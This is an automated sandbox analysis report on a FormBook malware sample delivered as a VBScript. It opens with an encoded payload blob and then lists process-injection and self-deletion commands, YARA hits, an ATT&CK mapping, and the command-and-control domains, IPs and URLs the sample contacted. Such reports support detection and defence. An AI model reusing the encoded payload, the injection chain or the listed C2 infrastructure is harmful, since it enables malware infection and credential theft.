CAAAADwAAABwAAAArJ3MGAAAKgAIAAAQXK+BzBwAACoADAAAEGCvTcwgAAAqABAAABBkrxioufgEAAARvCQAACioufgIAAARvCgAACioufgMAAARvCwAACioufgQAAARvDAAACir2FysBFiwAfgUAAAQUKBsAAAosJHIBAABwHChKAAAG0AUAAAIoEAAACm8cAAAKcx0AAAqABQAABH4FAAAEKhp+BgAABCoeAoAGAAAEKlZzDQAABigeAAAKdAYAAAKABwAABCoeAigfAAAKKhp+BwAABCoaKA4AAAYqHgIoEwAACioAABswDwDnBgAAAQAAESAADAAAKCAAAAoWKwEWRQwAAAAFAAAAVwEAAGQBAAAzAgAAaQIAAHoCAAClAgAA0wIAAPgCAAAVAwAAaQMAALUDAAA4dQYAAHMhAAAKJSgiAAAKbyMAAAoCKCQAAApyIQAAcBYoSgAABnItAABwFyhKAAAGbyUAAApyMQAAcBgoSgAABnI/AABwHChKAAAGbyUAAApyQwAAcBwoSgAABnJPAABwHihKAAAGbyUAAApyUwAAcBgoSgAABnJfAABwHShKAAAGbyUAAApyYwAAcBgoSgAABnJ1AABwHShKAAAGbyUAAApyeQAAcBwoSgAABnKLAABwFyhKAAAGbyUAAApyjwAAcB4oSgAABnKhAABwHihKAAAGbyUAAApypQAAcBwoSgAABnKxAABwGChKAAAGbyUAAApytQAAcBsoSgAABnLHAABwGyhKAAAGbyUAAApyywAAcBwoSgAABnLdAABwGShKAAAGbyUAAApy4QAAcB0oSgAABnLzAABwGihKAAAGbyUAAApvJgAACgoGbycAAAoLFzh0/v//BygkAAAKCxg4Z/7//wNy9wAAcBooSgAABhYoKAAACjoEAQAAHxooKQAACiVy+wAAcBooSgAABigqAAAKEwQSBP4WFQAAAW8RAAAKcv8AAHAdKEoAAAYoKwAACgxyCQEAcB0oSgAABigsAAAKKAEAACstTHMuAAAKcy8AAAoTBREFF28wAAAKEQVyFQEAcBkoSgAABm8xAAAKEQVyiQEAcBooSgAABggoMgAACm8zAAAKJREFbzQAAApvNQAACiZ+NgAACnL7AQBwHChKAAAGF283AAAKDRk4mP3//wlvOAAACnJXAgBwHChKAAAGKAIAACstEglyYQIAcB0oSgAABghvOgAACglvOwAACho4Yv3//wcoPAAACigWAAAGGzhR/f//OAgEAAAEcmsCAHAdKEoAAAYWKCgAAAo65gMAAB8aKCkAAAoTBhw4Jv3//xEGcz0AAApyCQEAcB0oSgAABm8+AAAKKAMAACs6ogMAACgqAAAKEwQdOPj8//8SBP4WFQAAAW8RAAAKcm8CAHAaKEoAAAYoMgAAChMHHjjT/P//EQZyeQIAcBwoSgAABhEHKD8AAAoTCB8JOLb8//9zLgAACnMvAAAKEwkRCRdvMAAAChEJcn0CAHAeKEoAAAZvMQAAChEJcvECAHAXKEoAAAYRCCgyAAAKbzMAAAolEQlvNAAACm81AAAKJh8KOGL8//8UEwpyYwMAcBYoSgAABnJ/AwBwKEAAAAooDQAAChMK3holKEEAAAoTCxYrARYsAisIKEIAAAoXK/TeABEKOb0CAAAUEwwfCzgW/P//EQoUcoEDAHAeKEoAAAYXjQYAAAElFnKfAwBwGihKAAAGohQUFChDAAAKKEQAAApyrwMAcBYoSgAABhEIKEUAAAooKgAACowVAAABKEYAAAoTDRENKEcAAAoTDhEOKEgAAAo6HAIAABEKFHLLAwBwHChKAAAGF40GAAABJRYRDqIlEw8UFBeNCAAAASUWF5wlExAoQwAAChEQFpEsHxEPFpooDQAACtAdAAABKBAAAAooSQAACnQdAAABEw4oDQAAChMMFisBFkUGAAAABQAAADEAAACCAJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"Jump to behavior
          Source: explorer.exe, 00000004.00000000.395001710.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.901713515.0000000001980000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program ManagerT7<=ge
          Source: explorer.exe, 00000004.00000000.395001710.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.910398118.00000000090D6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.405024865.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000000.395001710.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.901713515.0000000001980000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000004.00000002.901159197.0000000001378000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.394591990.0000000001378000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CProgmanile
          Source: explorer.exe, 00000004.00000000.395001710.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.901713515.0000000001980000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.434609421.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.900903995.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.434333688.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.901104255.0000000000610000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.434731548.0000000003840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.396459578.00000210A1804000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.901186308.0000000000640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.434609421.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.900903995.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.434333688.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.901104255.0000000000610000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.434731548.0000000003840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.396459578.00000210A1804000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.901186308.0000000000640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts11
          Command and Scripting Interpreter          		Path Interception712
          Process Injection          		1
          Rootkit          		1
          Credential API Hooking          		121
          Security Software Discovery          		Remote Services1
          Credential API Hooking          		Exfiltration Over Other Network Medium1
          Encrypted Channel          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default Accounts221
          Scripting          		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts31
          Virtualization/Sandbox Evasion          		LSASS Memory2
          Process Discovery          		Remote Desktop Protocol1
          Archive Collected Data          		Exfiltration Over Bluetooth4
          Ingress Tool Transfer          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain Accounts1
          Shared Modules          		Logon Script (Windows)Logon Script (Windows)712
          Process Injection          		Security Account Manager31
          Virtualization/Sandbox Evasion          		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local Accounts2
          PowerShell          		Logon Script (Mac)Logon Script (Mac)1
          Deobfuscate/Decode Files or Information          		NTDS1
          Application Window Discovery          		Distributed Component Object ModelInput CaptureScheduled Transfer13
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script221
          Scripting          		LSA Secrets1
          Remote System Discovery          		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common4
          Obfuscated Files or Information          		Cached Domain Credentials1
          File and Directory Discovery          		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items1
          Software Packing          		DCSync112
          System Information Discovery          		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 1272266 Sample: Scan_Doc.vbs Startdate: 13/07/2023 Architecture: WINDOWS Score: 100 47 Snort IDS alert for network traffic 2->47 49 Found malware configuration 2->49 51 Malicious sample detected (through community Yara rule) 2->51 53 4 other signatures 2->53 11 wscript.exe 1 2->11         started        process3 signatures4 65 VBScript performs obfuscated calls to suspicious functions 11->65 67 Suspicious powershell command line found 11->67 69 Wscript starts Powershell (via cmd or directly) 11->69 71 Very long command line found 11->71 14 powershell.exe 14 7 11->14         started        process5 dnsIp6 45 freswe.click 188.166.220.201, 49698, 80 DIGITALOCEAN-ASNUS Netherlands 14->45 79 Writes to foreign memory regions 14->79 81 Found suspicious powershell code related to unpacking or dynamic code loading 14->81 83 Injects a PE file into a foreign processes 14->83 18 svchost.exe 14->18         started        21 conhost.exe 14->21         started        signatures7 process8 signatures9 55 Modifies the context of a thread in another process (thread injection) 18->55 57 Maps a DLL or memory area into another process 18->57 59 Sample uses process hollowing technique 18->59 61 2 other signatures 18->61 23 explorer.exe 5 1 18->23 injected process10 dnsIp11 35 www.hyperpigmentation-91528.bond 185.53.179.91, 49703, 80 TEAMINTERNET-ASDE Germany 23->35 37 www.lajzznhk.cfd 150.95.255.38, 49704, 49705, 80 INTERQGMOInternetIncJP Japan 23->37 39 9 other IPs or domains 23->39 63 System process connects to network (likely due to code injection or exploit) 23->63 27 cmmon32.exe 12 23->27         started        signatures12 process13 dnsIp14 41 www.electorhome.com 27->41 43 electorhome.com 27->43 73 Modifies the context of a thread in another process (thread injection) 27->73 75 Maps a DLL or memory area into another process 27->75 77 Tries to detect virtualization through RDTSC time measurements 27->77 31 cmd.exe 1 27->31         started        signatures15 process16 process17 33 conhost.exe 31->33         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Scan_Doc.vbs11%ReversingLabsScript-WScript.Trojan.Heuristic

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://components.groove.net/Groove/Components/SystemComponents/SystemComponents.osd?Package=net.gro0%URL Reputationsafe
          http://www.lajzznhk.cfdReferer:0%Avira URL Cloudsafe
          http://www.styledinfaith.comReferer:0%Avira URL Cloudsafe
          http://www.baroevent.com/g94s/?DrKTC2=LjGd&e8a=GuZ41zQWOd+87sgZ9z9r0yJ0b7/bNTnEQt2o5soiWmDSZcifYwExlLr0dWNcGWkaVVoe0%Avira URL Cloudsafe
          http://www.apinspect.net/g94s/www.baroevent.com0%Avira URL Cloudsafe
          http://www.electorhome.com/g94s/?DrKTC2=LjGd&e8a=DrLsYuy7gOj5BxaRuY8JshorwtehudPC5U5L/ZfxJ0q6CwFmHXn0%Avira URL Cloudsafe
          http://freswe.clickx0%Avira URL Cloudsafe
          http://www.brezop.xyz0%Avira URL Cloudsafe
          http://www.93txm.liveReferer:0%Avira URL Cloudsafe
          http://www.justinwdong.com/g94s/0%Avira URL Cloudsafe
          http://www.lajzznhk.cfd0%Avira URL Cloudsafe
          http://components.groove.net/Groove/Components/Root.osd?Package=net.groove.Groove.Tools.System.Groov0%URL Reputationsafe
          http://www.xnmshx.cfdReferer:0%Avira URL Cloudsafe
          http://www.baroevent.comReferer:0%Avira URL Cloudsafe
          http://www.electorhome.com/g94s/www.apinspect.net0%Avira URL Cloudsafe
          http://www.yprblqkk.cfd/g94s/0%Avira URL Cloudsafe
          http://www.krmq9w.cfdReferer:0%Avira URL Cloudsafe
          http://www.styledinfaith.com0%Avira URL Cloudsafe
          http://www.baroevent.com/g94s/www.brezop.xyz0%Avira URL Cloudsafe
          http://www.qsmdrkjw.cfd/g94s/www.lajzznhk.cfd0%Avira URL Cloudsafe
          http://www.lajzznhk.cfd/g94s/0%Avira URL Cloudsafe
          http://www.hyperpigmentation-91528.bond0%Avira URL Cloudsafe
          http://www.hyperpigmentation-91528.bond/g94s/0%Avira URL Cloudsafe
          http://www.latamgradoenenfermeria.com/g94s/www.styledinfaith.com0%Avira URL Cloudsafe
          http://www.brezop.xyzReferer:0%Avira URL Cloudsafe
          http://www.qsmdrkjw.cfd/g94s/?e8a=4rsHG0K5vlabiiLb0b+gqyCvQQblgz1hCMRkDjqQQizxtgmj5/lVmT/rQgDGf/7aGVqR&DrKTC2=LjGd0%Avira URL Cloudsafe
          http://www.rixiojjl.cfd/g94s/www.krmq9w.cfd0%Avira URL Cloudsafe
          http://www.hyperpigmentation-91528.bond/g94s/?DrKTC2=LjGd&e8a=tzSFV3H7hErTYvWZwPPC/GAyGN0rrg2x5F2fwYgRRUbDdRuSW2XehEr5Lw08uOFm07l+0%Avira URL Cloudsafe
          http://www.latamgradoenenfermeria.com/g94s/0%Avira URL Cloudsafe
          http://www.hyperpigmentation-91528.bond/g94s/www.rixiojjl.cfd0%Avira URL Cloudsafe
          http://www.xnmshx.cfd/g94s/www.93txm.live0%Avira URL Cloudsafe
          http://www.justinwdong.com0%Avira URL Cloudsafe
          http://www.justinwdong.comReferer:0%Avira URL Cloudsafe
          http://www.lajzznhk.cfd/g94s/www.latamgradoenenfermeria.com0%Avira URL Cloudsafe
          http://www.electorhome.com0%Avira URL Cloudsafe
          http://www.lojq5vh.buzz/g94s/www.justinwdong.com0%Avira URL Cloudsafe
          http://www.electorhome.com/g94s/0%Avira URL Cloudsafe
          http://www.rixiojjl.cfd/g94s/0%Avira URL Cloudsafe
          www.krmq9w.cfd/g94s/0%Avira URL Cloudsafe
          http://www.yprblqkk.cfd/g94s/www.lojq5vh.buzz0%Avira URL Cloudsafe
          http://www.krmq9w.cfd/g94s/0%Avira URL Cloudsafe
          http://www.lojq5vh.buzz/g94s/0%Avira URL Cloudsafe
          http://www.brezop.xyz/g94s/0%Avira URL Cloudsafe
          http://www.krmq9w.cfd/g94s/www.qsmdrkjw.cfd0%Avira URL Cloudsafe
          http://www.brezop.xyz/g94s/www.hyperpigmentation-91528.bond0%Avira URL Cloudsafe
          http://www.qsmdrkjw.cfdReferer:0%Avira URL Cloudsafe
          http://www.latamgradoenenfermeria.comReferer:0%Avira URL Cloudsafe
          http://www.yprblqkk.cfd0%Avira URL Cloudsafe
          http://www.hyperpigmentation-91528.bondReferer:0%Avira URL Cloudsafe
          http://www.xnmshx.cfd/g94s/0%Avira URL Cloudsafe
          http://www.93txm.live0%Avira URL Cloudsafe
          http://www.lojq5vh.buzz0%Avira URL Cloudsafe
          http://www.apinspect.netReferer:0%Avira URL Cloudsafe
          http://www.93txm.live/g94s/0%Avira URL Cloudsafe
          http://freswe.click/v/sino.txt0%Avira URL Cloudsafe
          http://www.baroevent.com/g94s/0%Avira URL Cloudsafe
          http://www.latamgradoenenfermeria.com0%Avira URL Cloudsafe
          http://freswe.click0%Avira URL Cloudsafe
          http://www.styledinfaith.com/g94s/0%Avira URL Cloudsafe
          http://www.styledinfaith.com/g94s/www.xnmshx.cfd0%Avira URL Cloudsafe
          http://www.krmq9w.cfd0%Avira URL Cloudsafe
          http://www.baroevent.com0%Avira URL Cloudsafe
          http://www.rixiojjl.cfd0%Avira URL Cloudsafe
          http://www.qsmdrkjw.cfd/g94s/0%Avira URL Cloudsafe
          http://www.xnmshx.cfd0%Avira URL Cloudsafe
          http://www.electorhome.comReferer:0%Avira URL Cloudsafe
          http://www.lojq5vh.buzzReferer:0%Avira URL Cloudsafe
          http://www.rixiojjl.cfdReferer:0%Avira URL Cloudsafe
          http://www.apinspect.net/g94s/0%Avira URL Cloudsafe
          http://www.apinspect.net/g94s/?e8a=SOSNSp6179aTy13qq7TcaAlSRULweXb3E3crC3cjWejL5clntEZHzdPIzB6indnn7XUZ&DrKTC2=LjGd0%Avira URL Cloudsafe
          http://www.qsmdrkjw.cfd0%Avira URL Cloudsafe
          http://www.lajzznhk.cfd/g94s/?DrKTC2=LjGd&e8a=5qGn5zDRUH6BiPO85kMHocR4ZABcZylpPNAkuw/9HE6KA+R+11lsVjOMN8VjI6ygwzFy0%Avira URL Cloudsafe
          http://www.apinspect.net0%Avira URL Cloudsafe
          http://www.yprblqkk.cfdReferer:0%Avira URL Cloudsafe
          http://www.93txm.live/g94s/www.yprblqkk.cfd0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          baroevent.com
          		99.83.196.71
          		truetrue
            		unknown
            www.qsmdrkjw.cfd
            		150.95.255.38
            		truetrue
              		unknown
              electorhome.com
              		209.142.66.216
              		truetrue
                		unknown
                www.lajzznhk.cfd
                		150.95.255.38
                		truetrue
                  		unknown
                  apinspect.net
                  		76.223.105.230
                  		truetrue
                    		unknown
                    freswe.click
                    		188.166.220.201
                    		truefalse
                      		unknown
                      www.hyperpigmentation-91528.bond
                      		185.53.179.91
                      		truetrue
                        		unknown
                        www.electorhome.com
                        		unknown
                        		unknowntrue
                          		unknown
                          www.krmq9w.cfd
                          		unknown
                          		unknowntrue
                            		unknown
                            www.rixiojjl.cfd
                            		unknown
                            		unknowntrue
                              		unknown
                              www.baroevent.com
                              		unknown
                              		unknowntrue
                                		unknown
                                www.apinspect.net
                                		unknown
                                		unknowntrue
                                  		unknown

                                  Contacted URLs

                                  NameMaliciousAntivirus DetectionReputation
                                  http://www.baroevent.com/g94s/?DrKTC2=LjGd&e8a=GuZ41zQWOd+87sgZ9z9r0yJ0b7/bNTnEQt2o5soiWmDSZcifYwExlLr0dWNcGWkaVVoetrue
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.qsmdrkjw.cfd/g94s/?e8a=4rsHG0K5vlabiiLb0b+gqyCvQQblgz1hCMRkDjqQQizxtgmj5/lVmT/rQgDGf/7aGVqR&DrKTC2=LjGdtrue
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.hyperpigmentation-91528.bond/g94s/?DrKTC2=LjGd&e8a=tzSFV3H7hErTYvWZwPPC/GAyGN0rrg2x5F2fwYgRRUbDdRuSW2XehEr5Lw08uOFm07l+true
                                  • Avira URL Cloud: safe
                                  		unknown
                                  www.krmq9w.cfd/g94s/true
                                  • Avira URL Cloud: safe
                                  		low
                                  http://freswe.click/v/sino.txtfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.lajzznhk.cfd/g94s/?DrKTC2=LjGd&e8a=5qGn5zDRUH6BiPO85kMHocR4ZABcZylpPNAkuw/9HE6KA+R+11lsVjOMN8VjI6ygwzFytrue
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.apinspect.net/g94s/?e8a=SOSNSp6179aTy13qq7TcaAlSRULweXb3E3crC3cjWejL5clntEZHzdPIzB6indnn7XUZ&DrKTC2=LjGdtrue
                                  • Avira URL Cloud: safe
                                  		unknown

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
                                  http://www.apinspect.net/g94s/www.baroevent.comexplorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.electorhome.com/g94s/?DrKTC2=LjGd&e8a=DrLsYuy7gOj5BxaRuY8JshorwtehudPC5U5L/ZfxJ0q6CwFmHXncmmon32.exe, 00000007.00000002.901229697.00000000006F1000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.lajzznhk.cfdReferer:explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.styledinfaith.comReferer:explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://freswe.clickxpowershell.exe, 00000001.00000002.392901894.0000021091AF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://components.groove.net/Groove/Components/SystemComponents/SystemComponents.osd?Package=net.groexplorer.exe, 00000004.00000000.426945176.00007FFC1B439000.00000002.00000001.01000000.00000008.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.justinwdong.com/g94s/explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.93txm.liveReferer:explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.brezop.xyzexplorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.lajzznhk.cfdexplorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.electorhome.com/g94s/www.apinspect.netexplorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.xnmshx.cfdReferer:explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.baroevent.comReferer:explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.hyperpigmentation-91528.bondexplorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.yprblqkk.cfd/g94s/explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.qsmdrkjw.cfd/g94s/www.lajzznhk.cfdexplorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
